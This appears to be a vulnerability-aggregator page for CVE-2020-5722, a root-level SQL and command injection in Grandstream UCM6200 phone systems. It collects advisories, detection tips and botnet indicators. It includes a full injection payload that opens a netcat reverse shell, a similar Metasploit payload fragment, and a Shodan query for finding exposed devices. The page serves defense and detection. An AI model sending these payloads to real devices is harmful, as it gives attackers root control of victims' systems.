CVE-2020-5722
published 2020-03-23CVE-2020-5722: The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use…
PriorityP196critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-07-28
Exploited in the wild
EPSS
83.93%
99.7th percentile
The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| grandstream | ucm6200_firmware | < 1.0.19.20 | 1.0.19.20 |
Detection & IOCsextracted from sources · hover to see the quote
commandaction=sendPasswordEmail&user_name=admin' or 1=1--`;`nc${IFS}<lhost>${IFS}<lport>${IFS}-e${IFS}/bin/sh`;`↗
- →Detect exploitation attempts by monitoring HTTP POST requests to /cgi with action=sendPasswordEmail and SQL injection metacharacters (e.g., ' or 1=1--) in the user_name parameter. ↗
- →The exploit payload uses shell metacharacters injected via popen(): look for backtick-wrapped commands and ${IFS} substitution in HTTP POST body targeting the user_name parameter. ↗
- →Hoaxcalls C2 bot nicks always start with 'XTC|' followed by 9 random characters — use this pattern to detect infected hosts communicating over IRC. ↗
- →Palo Alto Networks threat prevention signatures 57897 and 57892 cover active exploitation of CVE-2020-5722 and CVE-2020-8515 respectively. ↗
- →Shodan query 'ssl:"Grandstream" "Set-Cookie: TRACKID"' identifies internet-exposed Grandstream UCM62xx devices potentially vulnerable to CVE-2020-5722. ↗
- →The Hoaxcalls malware uses XOR key 0xEC (derived from 5 table keys) to encrypt strings; decrypted marker string 'hubnr and vbrxmr was here' at index 0x21 can be used as a memory/binary signature. ↗
- →Monitor for outbound IRC connections to 178.32.148.5 on TCP port 1337 as a C2 beacon indicator for Hoaxcalls-infected devices. ↗
- →The exploit targets the sendPasswordEmail action on the /cgi endpoint over HTTPS port 8089; alert on unauthenticated POST requests to this endpoint from external IPs. ↗
- ·The shell metacharacter injection vector (RCE) was inadvertently patched in 1.0.19.20 as a side-effect of fixing CVE-2019-10662; the underlying SQL injection was only fully patched in 1.0.20.17. Devices on 1.0.19.x are still vulnerable to HTML injection via the same endpoint. ↗
- ·Hoaxcalls group 2 and 3 samples move propagation out of flooder commands and execute it at startup, and the malicious HTTP requests used differ slightly from group 1 — detection rules should account for all three payload variants. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Grandstream Networks UCM6200 Series SQL Injection Vulnerability
cisa·2022-01-28·CVSS 9.8
CVE-2020-5722 [CRITICAL] CWE-89 Grandstream Networks UCM6200 Series SQL Injection Vulnerability
Vulnerability: Grandstream Networks UCM6200 Series SQL Injection Vulnerability
Affected: Grandstream UCM6200
Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. Exploitation can allow for code execution as root.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-5722
Remediation Due Date: 2022-07-28
GHSA
GHSA-cggp-723h-vg48: The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request
ghsa_unreviewed·2022-05-24
CVE-2020-5722 [HIGH] CWE-89 GHSA-cggp-723h-vg48: The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request
The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.
VulnCheck
Grandstream Networks UCM6200 Series SQL Injection Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-5722 [CRITICAL] CWE-89 Grandstream Networks UCM6200 Series SQL Injection Vulnerability
Grandstream Networks UCM6200 Series SQL Injection Vulnerability
Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. Exploitation can allow for code execution as root.
Affected: Grandstream UCM6200
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/new-hoaxcalls-ddos-botnet/; https://www.radware.com/security/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/; https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/; https://blog.radware.com/security/botnets/2020/05/ghosting-bots-the-story-of-hoaxcalls-failures/; https://blog.netlab.360.com/ddos-botnet-moobot-en/; https://unit42.paloaltonetworks.com
No detection rules found.
Exploit-DB
UCM6202 1.0.18.13 - Remote Command Injection
exploitdb·2020-03-24·CVSS 9.8
CVE-2020-5722 [CRITICAL] UCM6202 1.0.18.13 - Remote Command Injection
UCM6202 1.0.18.13 - Remote Command Injection
---
# Exploit Title: UCM6202 1.0.18.13 - Remote Command Injection
# Date: 2020-03-23
# Exploit Author: Jacob Baines
# Vendor: http://www.grandstream.com
# Product Link: http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series
# Tested on: UCM6202 1.0.18.13
# CVE : CVE-2020-5722
# Shodan Dork: ssl:"Grandstream" "Set-Cookie: TRACKID"
# Advisory: https://www.tenable.com/security/research/tra-2020-15
#
# Sample output:
# albinolobster@ubuntu:~$ python3 pbx_sploit.py --rhost 192.168.2.1 --lhost 192.168.2.107
# [+] Sending getInfo request to https://192.168.2.1:8089/cgi
# [+] Remote target info:
# -> Model: UCM6202
# -> Version: 1.0.18.13
# [+] Vulnerable version!
# [+] Sending exploit. Reverse shell to 192.168.2.107:127
Metasploit
Grandstream UCM62xx IP PBX sendPasswordEmail RCE
metasploit·CVSS 8.8
CVE-2020-5722 [HIGH] Grandstream UCM62xx IP PBX sendPasswordEmail RCE
Grandstream UCM62xx IP PBX sendPasswordEmail RCE
This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an unauthenticated remote attacker to execute commands as root. Exploitation happens in two stages: 1. An SQL injection during username lookup while executing the "Forgot Password" function. 2. A command injection that occurs after the user provided username is passed to a Python script via the shell. Like so: /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \ password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e
Nuclei
Grandstream UCM6200 - SQL Injection
nuclei·CVSS 9.8
CVE-2020-5722 [CRITICAL] Grandstream UCM6200 - SQL Injection
Grandstream UCM6200 - SQL Injection
Grandstream UCM6200 series contains an unauthenticated remote SQL injection caused by crafted HTTP requests, letting attackers execute shell commands as root on versions before 1.0.19.20 or inject HTML in emails before 1.0.20.17.
Template:
id: CVE-2020-5722
info:
name: Grandstream UCM6200 - SQL Injection
author: theamanrawat
severity: critical
description: |
Grandstream UCM6200 series contains an unauthenticated remote SQL injection caused by crafted HTTP requests, letting attackers execute shell commands as root on versions before 1.0.19.20 or inject HTML in emails before 1.0.20.17.
impact: |
Attackers can execute root shell commands or inject malicious HTML, leading to full device compromise or phishing attacks.
remediation: |
Update to version 1.0
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Two New IoT Vulnerabilities Identified with Mirai Payloads
Threat Research Center
Threat Research
Vulnerabilities
## Two New IoT Vulnerabilities Identified with Mirai Payloads
Ken Hsu
Yue Guan
Vaibhav Singhal
Qi Deng
Published: October 14, 2020
Threat Research
Vulnerabilities
IoT
Mirai
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While t
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Two New IoT Vulnerabilities Identified with Mirai Payloads
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While this generic approach allows researchers to observe the entire killchain and even acquire the malware binary from the attack, this post-exploitation heuristic does have its caveat: the traffic fingerprinting. Similar services yield similar traffi
Unit42
Grandstream and DrayTek Devices Exploited to Power New Hoaxcalls DDoS Botnet
blogs_unit42·2020-04-03·CVSS 9.8
CVE-2020-5722 [CRITICAL] Grandstream and DrayTek Devices Exploited to Power New Hoaxcalls DDoS Botnet
Threat Research Center
Threat Research
Vulnerabilities
## Grandstream and DrayTek Devices Exploited to Power New Hoaxcalls DDoS Botnet
Ken Hsu
Haozhe Zhang
Zhibin Zhang
Ruchna Nigam
Published: April 3, 2020
Threat Research
Vulnerabilities
CVE-2020-5722
CVE-2020-8515
DDoS
Gafgyt
## Executive Summary
As soon as the proof-of-concept (PoC) for CVE-2020-8515 was made publicly available in March, this vulnerability was employed by a new DDoS botnet for propagation. Further analysis shows that this malware can also propagate by exploiting CVE-2020-5722 . As of now, the attack traffic detected has doubled since 03/31/2020, implying that many Grandstream UCM6200 and Draytek Vigor devices are infected or under active attack. We notified regional CERTs of potentially infected devi
Unit42
Grandstream and DrayTek Devices Exploited to Power New Hoaxcalls DDoS Botnet
blogs_unit42·2020-04-03·CVSS 9.8
CVE-2020-8515 [CRITICAL] Grandstream and DrayTek Devices Exploited to Power New Hoaxcalls DDoS Botnet
## Executive Summary
As soon as the proof-of-concept (PoC) for CVE-2020-8515 was made publicly available in March, this vulnerability was employed by a new DDoS botnet for propagation. Further analysis shows that this malware can also propagate by exploiting CVE-2020-5722. As of now, the attack traffic detected has doubled since 03/31/2020, implying that many Grandstream UCM6200 and Draytek Vigor devices are infected or under active attack. We notified regional CERTs of potentially infected devices identified during our research prior to publication in an effort to help with awareness and remediation. The Grandstream devices are business telephone systems providers over IP, whereas the latter are routers.
Both CVE-2020-8515 and CVE-2020-5722 have a critical rating (i.e CVSS v3.1 score of
Tenable
Grandstream UCM62xx SQL Injection
blogs_tenable·2020-03-23
Grandstream UCM62xx SQL Injection
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.htmlhttp://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.htmlhttps://www.tenable.com/security/research/tra-2020-15http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.htmlhttp://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.htmlhttps://www.tenable.com/security/research/tra-2020-15https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5722
2020-03-23
Published
2022-01-28
Added to CISA KEV
Exploited in the wild